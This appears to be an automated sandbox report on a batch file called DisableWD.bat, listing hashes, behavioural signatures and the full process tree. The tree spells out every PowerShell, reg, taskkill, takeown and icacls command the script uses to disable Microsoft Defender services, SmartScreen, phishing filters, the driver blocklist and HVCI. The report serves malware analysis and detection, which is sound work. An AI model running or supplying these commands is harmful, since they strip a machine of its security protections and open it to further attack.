Analysis

  • max time kernel
    4s
  • max time network
    9s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    29-02-2024 20:27

General

  • Target

    DisableWD.bat

  • Size

    4KB

  • MD5

    ceff74da4426916b94e3e84128e4330d

  • SHA1

    8030955eef7770ddc988c9c605cff09e2d5fba2f

  • SHA256

    d1e66cf40dac430e08836de4a4408d9b00393b552046fd7a1c697bcb92162121

  • SHA512

    f8e89bf283cd8ab9deeeb091eaf7529cbae12e9e3b07efe6d1f8010569489262dcb4c72fdbbe46f0affd460a9c0a2dd2be6565d88fa34df297718155314111e4

  • SSDEEP

    96:EBXITdcWyWVmWIW+Wn2m9HlMfCcI2B37tmSemS+qaWfmFWryYz8J8wLQLn6FP6Z:97V/9XfjmSzn

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DisableWD.bat"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -NonInteractive -NoLogo -NoProfile -C "Set-MpPreference -DisableRealtimeMonitoring 1"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4800
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\MsSecCore" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:2756
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:1936
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\MsSecWfp" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:3480
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:4480
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:2964
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:2268
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:3364
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:1420
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:4748
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies security service
      PID:2956
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies security service
      PID:3472
    • C:\Windows\system32\reg.exe
      reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      2⤵
      PID:1840
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:816
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:1788
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:2692
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      PID:1468
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f 2>nul | find /i "webthreatdefusersvc"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4484
      • C:\Windows\system32\reg.exe
        reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f
        3⤵
        PID:4600
      • C:\Windows\system32\find.exe
        find /i "webthreatdefusersvc"
        3⤵
        PID:3964
    • C:\Windows\system32\taskkill.exe
      taskkill /f /im smartscreen.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1504
    • C:\Windows\system32\takeown.exe
      takeown /F "C:\Windows\system32\smartscreen.exe" /A
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • Suspicious use of AdjustPrivilegeToken
      PID:2532
    • C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\smartscreen.exe" /grant Administrators:F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:2308
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
      2⤵
      PID:1344
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
      2⤵
      PID:2644
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
      2⤵
      PID:2248
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f
      2⤵
      PID:4388
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
      2⤵
      PID:1292
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
      2⤵
      PID:2712
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
      2⤵
      PID:3396
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
      2⤵
      PID:3304
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
      2⤵
      PID:1644
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f
      2⤵
      PID:564
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f
      2⤵
      PID:1236
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Control\CI\Config" /v "VulnerableDriverBlocklistEnable" /t REG_DWORD /d "0" /f
      2⤵
      PID:768
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d "0" /f
      2⤵
      PID:3436

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mxweaili.fws.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4800-9-0x000001FF55660000-0x000001FF55682000-memory.dmp

    Filesize

    136KB

  • memory/4800-10-0x00007FFAD70F0000-0x00007FFAD7BB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4800-12-0x000001FF534B0000-0x000001FF534C0000-memory.dmp

    Filesize

    64KB

  • memory/4800-11-0x000001FF534B0000-0x000001FF534C0000-memory.dmp

    Filesize

    64KB

  • memory/4800-13-0x000001FF534B0000-0x000001FF534C0000-memory.dmp

    Filesize

    64KB

  • memory/4800-16-0x00007FFAD70F0000-0x00007FFAD7BB1000-memory.dmp

    Filesize

    10.8MB